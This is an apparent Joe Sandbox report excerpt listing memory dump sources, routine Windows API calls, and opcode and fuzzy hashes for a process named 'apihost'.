                                                                                                                                • Source File: 0000000B.00000002.3497592130.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_4db0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFromIconResource
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3668623891-0
                                                                                                                                • Opcode ID: 12a53b43b1ceebafbe47be947c9f9637888054c6d6a1c74af88bef59b51ed340
                                                                                                                                • Instruction ID: c406db68509514dfcfa3433e964fb1fb09b1492ad9f18e44a282ec9f8d962e1c
                                                                                                                                • Opcode Fuzzy Hash: 12a53b43b1ceebafbe47be947c9f9637888054c6d6a1c74af88bef59b51ed340
                                                                                                                                • Instruction Fuzzy Hash: 06319871904349EFCB129FA9D800AEEBFF4EF09310F14806AE994EB221C335D950DBA1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1024 cafd0a-cafda4 DuplicateHandle 1025 cafdad-cafdca 1024->1025 1026 cafda6-cafdac 1024->1026 1026->1025
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CAFD97
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3484821889.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_ca0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: c132d58ebc815adaf2272b63d22b8484694babaea1a2064c02c42013436a0148
                                                                                                                                • Instruction ID: 4f178bd95ba0639b6232b5397b24c7695c9e0278c3fd9beb9cc3327d22826192
                                                                                                                                • Opcode Fuzzy Hash: c132d58ebc815adaf2272b63d22b8484694babaea1a2064c02c42013436a0148
                                                                                                                                • Instruction Fuzzy Hash: 5F21E3B5D00249AFDB11CFAAD584AEEFFF5EB49310F14845AE958A3210C378A945CF64
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CAFD97
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3484821889.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_ca0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 33d2c212b0db71e1fa4c218c46111ae964b5b2c7632ed8a58cb6bcacc15225a0
                                                                                                                                • Instruction ID: c22f672bbfc3b65a0de7afee7046818625ce23800ceafd3f16002f236f88e395
                                                                                                                                • Opcode Fuzzy Hash: 33d2c212b0db71e1fa4c218c46111ae964b5b2c7632ed8a58cb6bcacc15225a0
                                                                                                                                • Instruction Fuzzy Hash: E221E3B59002499FDB10CFAAD584ADEBBF8EB48310F14841AE918A3210C378A940CFA5
                                                                                                                                APIs
                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 04DBD592
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3497592130.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_4db0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: TextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 530164218-0
                                                                                                                                • Opcode ID: f122df25836e4698b11e3db242e92fb60a43d156ab0176270779bd336048acc9
                                                                                                                                • Instruction ID: e56129ddeaeb8a1b3e3bd01606eade5a9970731a921d079847409b11b79f8c13
                                                                                                                                • Opcode Fuzzy Hash: f122df25836e4698b11e3db242e92fb60a43d156ab0176270779bd336048acc9
                                                                                                                                • Instruction Fuzzy Hash: 072122B28002498FDB20DF9AC448BDEBBF5EF49324F10802AD859A7250D338A545CFA1
                                                                                                                                APIs
                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 04DBD592
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3497592130.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_4db0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: TextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 530164218-0
                                                                                                                                • Opcode ID: 612e3460c2d74c13d08d7bfffc75551d4227c3444b0a5ae8192837c048997b11
                                                                                                                                • Instruction ID: 7c1ebc1182eb700087eaf3ee2f953e71e960f993fa47bb37f15fe205ea2f642f
                                                                                                                                • Opcode Fuzzy Hash: 612e3460c2d74c13d08d7bfffc75551d4227c3444b0a5ae8192837c048997b11
                                                                                                                                • Instruction Fuzzy Hash: D61112B68002498FDB24CF9AC448ADEFBF5EF89320F14C42AD859A3240D338A545CFA5
                                                                                                                                APIs
                                                                                                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 04DBF967
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3497592130.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_4db0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFromIconResource
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3668623891-0
                                                                                                                                • Opcode ID: 2276149d3046bf7f7ac15f37e99a5d2fa68e3440e2a7bae8711a128aa091f010
                                                                                                                                • Instruction ID: 82f49df327412200e3387f6b7a7be5433256676df0d058a5928b8d92c2547639
                                                                                                                                • Opcode Fuzzy Hash: 2276149d3046bf7f7ac15f37e99a5d2fa68e3440e2a7bae8711a128aa091f010
                                                                                                                                • Instruction Fuzzy Hash: D91134B5800349DFDB20CFAAD844ADEBFF8EB48320F14841AE554A3210C339A990CFA5
                                                                                                                                APIs
                                                                                                                                • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 04DB4115
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3497592130.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_4db0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LongWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1378638983-0
                                                                                                                                • Opcode ID: 8024a407f2ecc9f5553b9a688234ab5ddbbe8a9aa8c5bad0262b87efb87cbd54
                                                                                                                                • Instruction ID: 321b9741c164afbbef2c8e74822bb5a452aec2cf2c586083917b23d4f689d1d0
                                                                                                                                • Opcode Fuzzy Hash: 8024a407f2ecc9f5553b9a688234ab5ddbbe8a9aa8c5bad0262b87efb87cbd54
                                                                                                                                • Instruction Fuzzy Hash: 4311E3B58002499FDB20DF99D485BEBBBF8EB58310F108419D959A7301C378A944CFA5
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 04DBFCCD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3497592130.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_4db0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 62f5a06792908c72dd4d675a6a17d00528994bdb3d5d8de7366b6975e08280b4
                                                                                                                                • Instruction ID: eaa9bd00a61379fb49cde249340fdee3fbb8fa55fe4ee719c8122315b7f4c290
                                                                                                                                • Opcode Fuzzy Hash: 62f5a06792908c72dd4d675a6a17d00528994bdb3d5d8de7366b6975e08280b4
                                                                                                                                • Instruction Fuzzy Hash: BA11F5B5800349DFDB20DF99D989BDEBBF8FB48310F108419E959A7200D375A984CFA5
                                                                                                                                APIs
                                                                                                                                • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 04DB4115
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3497592130.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_4db0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LongWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1378638983-0
                                                                                                                                • Opcode ID: 3aef6cbbc9d3663a44686fdb24c2b8fc2eb7a4a1a7eae5046e3c518ffd9c2990
                                                                                                                                • Instruction ID: 3d4e43927e21f17e96f348b99138f5ea8786d92e6b95abaf84e4ba275399ef36
                                                                                                                                • Opcode Fuzzy Hash: 3aef6cbbc9d3663a44686fdb24c2b8fc2eb7a4a1a7eae5046e3c518ffd9c2990
                                                                                                                                • Instruction Fuzzy Hash: C511F5B5900249DFDB20DF99D449BDEBBF8EB48310F108459D959B7301D378A944CFA5
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00CAD67E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3484821889.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_ca0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: a10f34c04e0bf2af4968256ea4b47caa2e7dbbc50d79a65174924b1ae5c195a7
                                                                                                                                • Instruction ID: 38ea317548c896687a8fee898dce13f1098270be91d84f922e62413894f064e1
                                                                                                                                • Opcode Fuzzy Hash: a10f34c04e0bf2af4968256ea4b47caa2e7dbbc50d79a65174924b1ae5c195a7
                                                                                                                                • Instruction Fuzzy Hash: 3611DFB5C003498FCB20DF9AD444ADEFBF4EB89314F14842AD42AA7610C379A545CFA5
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 05BE319D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3499357134.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_5be0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                • Opcode ID: 2a53bddaafdc77128db4ced253bf27b2e5f46efa3a6e8f19bd7a82ef2839d449
                                                                                                                                • Instruction ID: a29aced2df896ab453275ba54d1e1c7d1fbc2ee813babf42298415ba1cc7757b
                                                                                                                                • Opcode Fuzzy Hash: 2a53bddaafdc77128db4ced253bf27b2e5f46efa3a6e8f19bd7a82ef2839d449
                                                                                                                                • Instruction Fuzzy Hash: CF1115B59003488FCB20DF9AD948BDEFBF4EB48310F248859D519A7200C379A944CFA5
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 04DBFCCD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3497592130.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_4db0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 7c1f3b26fa1438b872ec6e4d9934590c7c70eab5d505c1e519b40bfc8dbe8cd0
                                                                                                                                • Instruction ID: f004d28d2b218e81dd662f9b1b12d6819ee81a56301b8d103e6b9a9d420cfa59
                                                                                                                                • Opcode Fuzzy Hash: 7c1f3b26fa1438b872ec6e4d9934590c7c70eab5d505c1e519b40bfc8dbe8cd0
                                                                                                                                • Instruction Fuzzy Hash: 3D11B3B5800349DFDB11DF99D985BDEBBF4FB48310F10841AD959A7240C375A584CFA5
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 05BE319D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3499357134.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_5be0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                • Opcode ID: 3c885a3f36be919a37effa289d8c8b8cc70da00181698121f34b693964999360
                                                                                                                                • Instruction ID: 1c9ccaabf2e08ffb7ebc174b9fdff10044a25ab92f53d0a4655b1ab38484807d
                                                                                                                                • Opcode Fuzzy Hash: 3c885a3f36be919a37effa289d8c8b8cc70da00181698121f34b693964999360
                                                                                                                                • Instruction Fuzzy Hash: 961100B58003498FCB20DF9AD549B9EBBF4EB48320F248859D519A7210C378A544CFA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3477479248.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_9fd000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ee78bd5c8c72aafd41306b45dacfb075f45e6385932a97dfce6249cf579c3d60
                                                                                                                                • Instruction ID: da71c4d5fb8546b857dd5ff3f1883e887b62f8629216c0d798880a78512ca74f
                                                                                                                                • Opcode Fuzzy Hash: ee78bd5c8c72aafd41306b45dacfb075f45e6385932a97dfce6249cf579c3d60
                                                                                                                                • Instruction Fuzzy Hash: B221F571504208DFDB15DF24D584B26BF6AFB84314F28C969DA094B356CB3AD807CB61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3477479248.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_9fd000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a76608446676e25328283ba00cc0e657bc900c0afc7609b7a5cca80bfa823823
                                                                                                                                • Instruction ID: 798ff62801d56f4a5ffe4d30546793ffd103b9ec7936361ade30a9252e369058
                                                                                                                                • Opcode Fuzzy Hash: a76608446676e25328283ba00cc0e657bc900c0afc7609b7a5cca80bfa823823
                                                                                                                                • Instruction Fuzzy Hash: 7B218E755093848FCB02CF24D994715BF72EB46314F28C5EAD9498B2A7C33A980ACB62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3477172299.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_9ed000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ae0aee2676b2c69840bad1a3787da1e30ba2cf8681f27f5420b8f563563f32e8
                                                                                                                                • Instruction ID: 7c6257c26eb4d89bc8f59ff6e323bb926f71893cfc248312edb02996661e8230
                                                                                                                                • Opcode Fuzzy Hash: ae0aee2676b2c69840bad1a3787da1e30ba2cf8681f27f5420b8f563563f32e8
                                                                                                                                • Instruction Fuzzy Hash: 2601DB710063849AE7219B27CD84B67FF9CEF55321F2CC82AED095B286C67D9C41CA75
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3477172299.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_9ed000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 831a5266861fbc0aef190bda84aada36bfbe77736ead967dfedb64e171a588d4
                                                                                                                                • Instruction ID: b1aa4ee8ac5f2ccb6ace33aca2b2398b4fea1c750457d7bcb381d6340c4ace34
                                                                                                                                • Opcode Fuzzy Hash: 831a5266861fbc0aef190bda84aada36bfbe77736ead967dfedb64e171a588d4
                                                                                                                                • Instruction Fuzzy Hash: 36F0C2710053849AEB218B16C884B63FFACEF51335F18C45AED484B286C2799C40CA70